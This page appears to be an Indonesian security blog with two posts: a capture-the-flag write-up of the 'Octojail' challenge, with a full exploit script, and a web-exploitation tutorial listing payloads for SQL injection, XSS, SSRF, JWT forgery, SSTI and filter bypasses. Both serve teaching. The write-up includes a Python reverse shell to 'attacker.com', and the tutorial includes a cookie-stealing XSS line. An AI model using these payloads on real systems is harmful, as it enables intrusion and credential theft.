Cysec

CTF@AC - Octojail Writeup

Sat, 11 Oct 2025 00:00:00 GMT

Challenge Information

Challenge Name: Octojail

Author: thek0der

Category: Misc

Description: "We only like octal around here!"

Flag: ctf{0331641fadb35abb1eb5a9640fa6156798cba4538148ceb863dfb1821ac69000}

Challenge Analysis

Source Code

Challenge memberikan source code Python berikut:

#!/usr/bin/env python3

import io, os, re, sys, tarfile, importlib.util, signal

OCTAL_RE = re.compile(r'^[0-7]+$')

def to_bytes_from_octal_triplets(s: str) -> bytes:
    if not OCTAL_RE.fullmatch(s):
        sys.exit("invalid: only octal digits 0-7")
    if len(s) % 3 != 0:
        sys.exit("invalid: length must be multiple of 3")
    if len(s) > 300000:
        sys.exit("too long")
    return bytes(int(s[i:i+3], 8) for i in range(0, len(s), 3))

def safe_extract(tf: tarfile.TarFile, path: str):
    def ok(m: tarfile.TarInfo):
        name = m.name
        return not (name.startswith("/") or ".." in name)
    for m in tf.getmembers():
        if ok(m):
            tf.extract(m, path)

def load_and_run_plugin():
    for candidate in ("uploads/plugin.py", "plugin.py"):
        if os.path.isfile(candidate):
            spec = importlib.util.spec_from_file_location("plugin", candidate)
            mod = importlib.util.module_from_spec(spec)
            spec.loader.exec_module(mod)
            if hasattr(mod, "run"):
                return mod.run()
            break
    print("No plugin found.")

def timeout(*_): sys.exit("timeout")
signal.signal(signal.SIGALRM, timeout)
signal.alarm(6)

print("Send octal")
data = sys.stdin.readline().strip()
blob = to_bytes_from_octal_triplets(data)

bio = io.BytesIO(blob)
try:
    with tarfile.open(fileobj=bio, mode="r:*") as tf:
        os.makedirs("uploads", exist_ok=True)
        safe_extract(tf, "uploads")
except Exception as e:
    sys.exit(f"bad archive: {e}")

load_and_run_plugin()

Program Flow

Mari kita breakdown apa yang dilakukan program ini:

1. Input Validation

OCTAL_RE = re.compile(r'^[0-7]+$')

def to_bytes_from_octal_triplets(s: str) -> bytes:
    if not OCTAL_RE.fullmatch(s):
        sys.exit("invalid: only octal digits 0-7")
    if len(s) % 3 != 0:
        sys.exit("invalid: length must be multiple of 3")
    if len(s) > 300000:
        sys.exit("too long")
    return bytes(int(s[i:i+3], 8) for i in range(0, len(s), 3))

Program memvalidasi input dengan aturan:

Hanya digit octal (0-7) yang diperbolehkan
Panjang harus kelipatan 3 karena setiap 3 digit octal = 1 byte
Maksimal 300,000 karakter untuk mencegah DoS
Setiap 3 digit dikonversi ke byte: "141" → int("141", 8) → 97 → byte a

Contoh konversi:

"141" (octal) = 1×8² + 4×8¹ + 1×8⁰ = 64 + 32 + 1 = 97 = ASCII 'a'
"150" (octal) = 1×8² + 5×8¹ + 0×8⁰ = 64 + 40 + 0 = 104 = ASCII 'h'

2. Tar Archive Extraction

bio = io.BytesIO(blob)
with tarfile.open(fileobj=bio, mode="r:*") as tf:
    os.makedirs("uploads", exist_ok=True)
    safe_extract(tf, "uploads")

Setelah decode octal ke bytes:

Bytes dibungkus dalam BytesIO object
Dibuka sebagai tar archive (mode r:* auto-detect compression)
Extract ke folder uploads/

3. Safe Extract Function

def safe_extract(tf: tarfile.TarFile, path: str):
    def ok(m: tarfile.TarInfo):
        name = m.name
        return not (name.startswith("/") or ".." in name)
    for m in tf.getmembers():
        if ok(m):
            tf.extract(m, path)

Fungsi ini mencoba mencegah path traversal dengan:

❌ Reject file yang dimulai dengan / (absolute path)
❌ Reject file yang mengandung .. (parent directory)
✅ Extract hanya file yang "aman"

4. Plugin Loading

def load_and_run_plugin():
    for candidate in ("uploads/plugin.py", "plugin.py"):
        if os.path.isfile(candidate):
            spec = importlib.util.spec_from_file_location("plugin", candidate)
            mod = importlib.util.module_from_spec(spec)
            spec.loader.exec_module(mod)
            if hasattr(mod, "run"):
                return mod.run()
            break

Setelah extract, program mencari plugin Python:

Cek uploads/plugin.py dulu
Jika tidak ada, cek plugin.py
Load sebagai module dan execute run() function

5. Timeout Protection

signal.signal(signal.SIGALRM, timeout)
signal.alarm(6)

Program akan timeout setelah 6 detik untuk mencegah infinite loops.

Vulnerability Analysis

The Vulnerability

Vulnerability utama ada di plugin loading mechanism:

for candidate in ("uploads/plugin.py", "plugin.py"):
    if os.path.isfile(candidate):
        spec = importlib.util.spec_from_file_location("plugin", candidate)
        mod = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(mod)  # ← ARBITRARY CODE EXECUTION!

Program akan execute arbitrary Python code dari file plugin.py yang kita upload!

Why Safe Extract Isn't Safe Enough

Meskipun ada safe_extract(), kita masih bisa:

Upload file ke uploads/plugin.py (tidak mengandung / atau ..)
File akan di-extract ke uploads/plugin.py
Program akan load dan execute code kita

Exploitation Path

[Octal String]
    ↓ decode
[Tar Archive Bytes]
    ↓ extract
[uploads/plugin.py]
    ↓ load & execute
[Arbitrary Code Execution!]

Solution

Strategy

Create malicious plugin.py yang membaca flag
Pack into tar.gz archive
Convert to octal encoding
Send to server
Receive flag

Step-by-Step Exploitation

Step 1: Create Malicious Plugin

def run():
    print(open('/app/flag.txt').read())

Simple Python code yang:

Define function run()
Read /app/flag.txt
Print isinya

Step 2: Create Tar Archive

with tarfile.open("payload.tar.gz", "w:gz") as tf:
    info = tf.gettarinfo("plugin.py")
    info.name = "plugin.py"  # Nama dalam archive
    with open("plugin.py", "rb") as src:
        tf.addfile(info, src)

Membuat tar.gz archive dengan:

Compression: gzip
Member name: plugin.py (akan extract ke uploads/plugin.py)

Step 3: Convert to Octal

data = open("payload.tar.gz", "rb").read()
octal = "".join(f"{b:03o}" for b in data)

Setiap byte dikonversi ke 3-digit octal:

Byte 0x1F (31) → "037"
Byte 0x8B (139) → "213"
Format: {byte:03o} = zero-padded 3-digit octal

Step 4: Send to Server

s = socket.create_connection((HOST, PORT))
s.sendall((octal + "\n").encode())

Connect dan kirim octal string diakhiri newline.

Step 5: Receive Output

out = b""
while True:
    try:
        chunk = s.recv(4096)
        if not chunk: break
        out += chunk
    except Exception:
        break
print(out.decode(errors="ignore"))

Receive semua output sampai connection close.

Full Exploit Code

#!/usr/bin/env python3
import tarfile, socket

HOST, PORT = "ctf.ac.upt.ro", 9908

# 1. Create malicious plugin.py
with open("plugin.py", "w") as f:
    f.write("def run():\n    print(open('/app/flag.txt').read())\n")

# 2. Create tar.gz archive
with tarfile.open("payload.tar.gz", "w:gz") as tf:
    info = tf.gettarinfo("plugin.py")
    info.name = "plugin.py"
    with open("plugin.py", "rb") as src:
        tf.addfile(info, src)

# 3. Read archive and convert to octal
data = open("payload.tar.gz", "rb").read()
octal = "".join(f"{b:03o}" for b in data)

print(f"[*] Payload size: {len(data)} bytes")
print(f"[*] Octal length: {len(octal)} chars")

# 4. Connect and send payload
print(f"[*] Connecting to {HOST}:{PORT}")
s = socket.create_connection((HOST, PORT))
s.sendall((octal + "\n").encode())

# 5. Receive output
out = b""
while True:
    try:
        chunk = s.recv(4096)
        if not chunk: break
        out += chunk
    except Exception:
        break

print("[+] Output:")
print(out.decode(errors="ignore"))

s.close()

Running the Exploit

$ python3 solver.py
[*] Payload size: 156 bytes
[*] Octal length: 468 chars
[*] Connecting to ctf.ac.upt.ro:9908
[+] Output:
Send octal
ctf{0331641fadb35abb1eb5a9640fa6156798cba4538148ceb863dfb1821ac69000}

Key Takeaways

What We Learned

Octal Encoding
- Octal adalah base-8 numbering system (0-7)
- Sering digunakan untuk encoding/obfuscation
- 3 octal digits = 1 byte (karena 8³ = 512 > 256)
Tar File Structure
- Tar archives bisa contain arbitrary files
- Python tarfile module support compression (gz, bz2, xz)
- Member names bisa dimanipulasi
Path Traversal Defense
- Blocking .. dan / adalah insufficient
- Perlu check resolved path dengan os.path.realpath()
- Better: use whitelist approach
Dynamic Code Loading
- importlib sangat powerful tapi dangerous
- Loading user-supplied code = RCE
- Always sandbox untrusted code

Defense Recommendations

Untuk mencegah vulnerability seperti ini:

# BAD - Vulnerable
spec.loader.exec_module(mod)

# BETTER - Validate content
import ast
tree = ast.parse(plugin_code)
# Analyze AST, block dangerous imports

# BEST - Don't execute user code
# Use configuration files (JSON/YAML) instead

Alternative Approaches

Method 1: Direct File Read

Alih-alih menggunakan open(), kita bisa:

def run():
    import subprocess
    print(subprocess.check_output(['cat', '/app/flag.txt']).decode())

Method 2: Reverse Shell

Untuk persistent access:

def run():
    import socket, subprocess, os
    s = socket.socket()
    s.connect(("attacker.com", 4444))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])

Method 3: Environment Variables

Check untuk secrets di environment:

def run():
    import os
    print(os.environ)

Conclusion

Challenge octojail adalah excellent example dari:

Custom encoding schemes (octal)
Archive manipulation
Python sandbox escape
Arbitrary code execution

Vulnerability terjadi karena program me-load dan execute user-supplied Python code tanpa proper sandboxing. Meskipun ada protection untuk path traversal, fundamental design flaw membuat challenge ini vulnerable.

Flag: ctf{0331641fadb35abb1eb5a9640fa6156798cba4538148ceb863dfb1821ac69000}

Challenge Rating: Medium

Skills Required: Python, Tar files, Octal encoding, Code analysis

Skills Learned: Archive exploitation, Dynamic module loading, Encoding schemes

Happy hacking! 🚩

CTF Web Exploitation

Sat, 11 Oct 2025 00:00:00 GMT

Apa itu CTF Web Exploitation?

Capture The Flag (CTF) adalah kompetisi keamanan siber yang menantang peserta untuk menemukan "flag" yang tersembunyi dengan mengeksploitasi kerentanan dalam sistem. Kategori Web Exploitation fokus pada kerentanan aplikasi web yang umum ditemukan di dunia nyata.

Kategori Umum dalam Web CTF

1. SQL Injection

SQL Injection adalah salah satu kerentanan paling umum dalam CTF. Attacker dapat memanipulasi query SQL untuk mengakses, memodifikasi, atau menghapus data.

Contoh Payload:

' OR '1'='1' --
admin' --
' UNION SELECT NULL, username, password FROM users --

Cara Mendeteksi:

Input field yang tidak ter-sanitasi
Error messages yang menampilkan SQL syntax
Response time yang berbeda untuk payload yang berbeda (Blind SQLi)

2. Cross-Site Scripting (XSS)

XSS memungkinkan attacker untuk menjalankan JavaScript berbahaya di browser korban.

Tipe-tipe XSS:

Reflected XSS: Payload di-reflect langsung dalam response
Stored XSS: Payload tersimpan di database
DOM-based XSS: Manipulasi DOM di client-side

Contoh Payload:

<script>alert(document.cookie)</script>
<img src=x onerror="alert('XSS')">
<svg onload="alert(1)">

3. Local File Inclusion (LFI)

LFI memungkinkan attacker membaca file lokal dari server.

Contoh:

?file=../../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=index.php
?file=/var/log/apache2/access.log

Teknik Advanced:

PHP wrapper exploitation
Log poisoning
Path truncation

4. Remote Code Execution (RCE)

RCE adalah holy grail dari web exploitation - kemampuan untuk menjalankan kode arbitrary di server.

Common Vectors:

Command injection via system(), exec(), shell_exec()
Deserialization vulnerabilities
Server-Side Template Injection (SSTI)

Contoh Payload:

; ls -la
| cat /etc/passwd
`whoami`

5. Server-Side Request Forgery (SSRF)

SSRF memungkinkan attacker membuat server melakukan request ke resource internal yang tidak seharusnya dapat diakses.

Target Umum:

# Cloud Metadata (AWS)
http://169.254.169.254/latest/meta-data/

# Internal Services
http://127.0.0.1:8080/admin
http://localhost:6379/  (Redis)

# File System
file:///etc/passwd

Bypass Techniques:

# IP Encoding
http://2130706433/ (127.0.0.1 in decimal)
http://0177.0.0.1/ (octal)
http://0x7f.0x0.0x0.0x1/ (hex)

# URL Parser Issues
http://expected-host@evil-host/

# Protocol Wrapper
gopher://127.0.0.1:6379/
dict://127.0.0.1:6379/info

Tools:

SSRFmap: Automated SSRF exploitation
Gopherus: Generate gopher payloads

6. Authentication & Authorization Bypass

Authentication dan Authorization adalah dua konsep berbeda yang sering menjadi target dalam CTF. Authentication memverifikasi "siapa Anda", sedangkan Authorization menentukan "apa yang boleh Anda lakukan".

A. Authentication Bypass

1. SQL Injection-based Auth Bypass:

Memanipulasi query SQL untuk bypass login:

# Original query
SELECT * FROM users WHERE username='$user' AND password='$pass'

# Bypass payloads
Username: admin' OR '1'='1' --
Password: anything

Username: admin' --
Password: anything

Username: ' OR 1=1 --
Password: anything

2. Weak Password Attacks:

# Brute force dengan hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# Dictionary attack dengan Burp Intruder
# Common default credentials
admin:admin
admin:password
root:root
admin:12345

3. JWT (JSON Web Token) Manipulation:

JWT Structure:

[Header].[Payload].[Signature]

Attack Vectors:

a) None Algorithm:

{
  "alg": "none",
  "typ": "JWT"
}

Ubah algorithm ke "none" dan hapus signature.

b) Algorithm Confusion (RS256 to HS256):

# Server menggunakan RS256 dengan public key
# Attacker change ke HS256 dan sign dengan public key
import jwt
public_key = open('public.pem', 'r').read()
token = jwt.encode({"user":"admin"}, public_key, algorithm='HS256')

c) Weak Secret:

# Crack JWT secret
hashcat -m 16500 jwt.txt wordlist.txt
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

d) JWT Claims Manipulation:

{
  "user": "admin",     // Change dari "user"
  "role": "admin",     // Change dari "user"
  "exp": 9999999999    // Extend expiration
}

4. Session-based Attacks:

Session Fixation:

1. Attacker mendapat session ID: SESSIONID=abc123
2. Victim login dengan session ID yang sama
3. Attacker menggunakan session ID untuk access akun victim

Session Hijacking:

# Via XSS
<script>document.location='http://attacker.com/?c='+document.cookie</script>

# Via network sniffing (if HTTP not HTTPS)

Predictable Session IDs:

# Jika session ID sequential atau predictable
session_ids = [f"SESS{i}" for i in range(1000, 2000)]
# Try each session ID

5. Cookie Manipulation:

// Decode base64 cookie
atob("dXNlcj1ndWVzdA==")  // Output: user=guest

// Modify and re-encode
btoa("user=admin")  // dXNlcj1hZG1pbg==

// Tamper with serialized cookies
user=O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}

B. Authorization Bypass

1. Insecure Direct Object Reference (IDOR):

# Normal request
GET /api/user/1234/profile

# IDOR - access other user's profile
GET /api/user/1235/profile
GET /api/user/1/profile  (admin?)

# Mass Assignment
POST /api/user/1234/update
{"email": "new@email.com", "role": "admin"}

2. Path Traversal in Authorization:

# Bypass dengan path manipulation
/admin/../../user/profile
/admin/../user/settings
/admin/%2e%2e%2fuser/data

3. HTTP Method Tampering:

# POST blocked but PUT/PATCH allowed
curl -X PUT http://target.com/admin/delete/user/123

# GET blocked but HEAD allowed
curl -I http://target.com/admin

4. Parameter Pollution:

# Application checks first parameter
/admin?role=user&role=admin

# Try array notation
/admin?role[]=user&role[]=admin

5. Missing Function Level Access Control:

# Access admin functions directly
/user/profile  (allowed)
/admin/panel  (should check but doesn't)
/api/admin/deleteUser?id=123

6. OAuth/SAML Vulnerabilities:

OAuth Misconfigurations:

# Open redirect in redirect_uri
?redirect_uri=https://attacker.com

# Token leakage via Referer header
# CSRF in OAuth flow

SAML Attacks:

<!-- XML Signature Wrapping -->
<!-- Comment injection -->
<!-- XXE in SAML response -->

Advanced Techniques:

1. Race Conditions:

# Multiple simultaneous requests
# Bypass rate limiting or one-time token checks
import threading
def attempt_login():
    requests.post('/login', data={'token': 'one-time-token'})

threads = [threading.Thread(target=attempt_login) for _ in range(10)]
[t.start() for t in threads]

2. 2FA Bypass:

# Techniques:
- Response manipulation (change "success":false to true)
- Direct access to post-2FA endpoint
- Brute force 2FA code (if no rate limit)
- Backup codes enumeration
- Remember me functionality abuse

3. Password Reset Vulnerabilities:

# Host header injection
Host: attacker.com

# Token leakage via Referer
# Predictable tokens
# Token doesn't expire
# Token reuse

Tools:

Burp Suite: Intercept dan modify requests
JWT.io: JWT decoder/encoder
Postman: API testing
Hydra/Medusa: Brute force
AuthMatrix: Burp extension untuk testing authorization

Real-World Examples:

Facebook OAuth vulnerability
GitHub JWT bypass
Instagram password reset flaw
Uber IDOR vulnerability

Mitigation:

Authentication:

Implement proper password hashing (bcrypt, argon2)
Use strong JWT secrets
Implement rate limiting
Multi-factor authentication
Secure session management

Authorization:

Implement proper access control checks
Validate user permissions on every request
Use centralized authorization logic
Principle of least privilege
Log and monitor access attempts

7. Server-Side Template Injection (SSTI)

SSTI adalah kerentanan yang terjadi ketika user input di-embed ke dalam template engine tanpa proper sanitization, memungkinkan attacker untuk inject template directives dan menjalankan arbitrary code di server.

Template Engines yang Rentan:

Python: Jinja2, Mako, Tornado
PHP: Twig, Smarty
JavaScript: Handlebars, Pug, EJS
Java: Freemarker, Velocity
Ruby: ERB, Slim

Cara Deteksi:

Test dengan payload sederhana untuk melihat apakah expression di-evaluate:

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}

Jika output menunjukkan 49 atau hasil evaluasi lainnya, kemungkinan vulnerable terhadap SSTI.

Payload Umum:

Jinja2 (Python/Flask):

# Basic RCE
{{config.items()}}
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}

# Alternative payloads
{{''.__class__.__mro__[1].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}

# File read
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

Twig (PHP):

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.setCache("ftp://attacker.net/")}}{{_self.env.loadTemplate("backdoor")}}

EJS (Node.js):

<%- global.process.mainModule.require('child_process').execSync('cat /etc/passwd') %>

Freemarker (Java):

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Teknik Exploitation:

Identifikasi Template Engine
- Test berbagai payload untuk menentukan engine yang digunakan
- Lihat error messages untuk clue tentang technology stack

Bypass Filters

# Jika '.' di-block
{{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('id')['read']()}}

# Jika '__' di-block
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}

# Menggunakan encoding
{{"__cla"+"ss__"}}

RCE via Built-in Functions

# Python
{{lipsum.__globals__['os'].popen('ls').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}

# Access to config
{{config['SECRET_KEY']}}

Blind SSTI

Gunakan time-based detection
Out-of-band interaction (DNS, HTTP)

{{''.__class__.__mro__[1].__subclasses__()[396]('sleep 5',shell=True,stdout=-1).communicate()}}

Tools untuk SSTI:

tplmap: Automated SSTI detection and exploitation
```
tplmap -u 'http://target.com/page?name=test'
```
SSTImap: Alternative tool untuk SSTI scanning
Burp Suite Extensions: Backslash Powered Scanner

Real-World Impact:

Remote Code Execution
Full server compromise
Data exfiltration
Privilege escalation
Internal network access

Mitigation:

Selalu sanitize user input
Gunakan sandboxed template environments
Implement whitelist untuk allowed characters
Avoid passing user input directly ke template engine
Use logic-less templates jika memungkinkan

Tools yang Sering Digunakan

Reconnaissance

Burp Suite: Web proxy untuk intercept dan modify requests
OWASP ZAP: Alternative open-source untuk Burp
ffuf/gobuster: Directory fuzzing
Nmap: Port scanning

Exploitation

sqlmap: Automated SQL injection tool
XSStrike: XSS detection and exploitation
CyberChef: Encoding/decoding utility
curl/wget: Manual HTTP requests

Analysis

Developer Tools: Browser built-in tools
Wappalyzer: Technology detection
nikto: Web server scanner

Metodologi Solving Web CTF

1. Reconnaissance

Inspect source code (HTML, JS, CSS)
Check robots.txt, sitemap.xml
Look for comments, debug information
Identify technology stack

2. Enumeration

Directory fuzzing
Parameter discovery
Subdomain enumeration
API endpoint discovery

3. Vulnerability Analysis

Test input fields
Check for common vulnerabilities
Analyze authentication mechanisms
Review session management

4. Exploitation

Craft payload
Bypass filters (WAF, input validation)
Chain multiple vulnerabilities
Privilege escalation

5. Post-Exploitation

Find the flag
Document findings
Clean up traces

Tips & Tricks

Always View Source: Flag bisa tersembunyi di HTML comments, JavaScript, atau CSS
Intercept Everything: Gunakan proxy untuk melihat semua requests/responses
Test Input Validation: Coba berbagai payloads untuk bypass filters
Chain Vulnerabilities: Kombinasi multiple bugs untuk exploitasi yang lebih powerful
Read Documentation: Pahami teknologi yang digunakan oleh target
Use CTF Platforms: Practice di platform seperti HackTheBox, TryHackMe, PicoCTF

Common Bypasses

WAF Bypass

# Case variation
<ScRiPt>alert(1)</sCrIpT>

# Encoding
%3Cscript%3Ealert(1)%3C/script%3E

# Nested tags
<scr<script>ipt>alert(1)</scr</script>ipt>

Filter Bypass

# Blacklist bypass
cat fl''ag.txt
c''at flag.txt

# Whitespace alternatives
cat${IFS}flag.txt
cat$IFS$9flag.txt

Resources untuk Belajar

WebGoat: OWASP interactive security lessons
DVWA: Damn Vulnerable Web Application
PortSwigger Academy: Free web security training
PentesterLab: Hands-on web penetration testing
CTFtime: Calendar dan writeups dari CTF competitions

Kesimpulan

Web exploitation adalah skill fundamental dalam cybersecurity. CTF competitions adalah cara yang excellent untuk belajar dan practice dalam lingkungan yang aman dan legal. Selalu remember:

Practice di environment yang legal
Jangan test di sistem tanpa permission
Document your learning process
Share knowledge dengan community

Happy hacking, dan selamat berburu flag! 🚩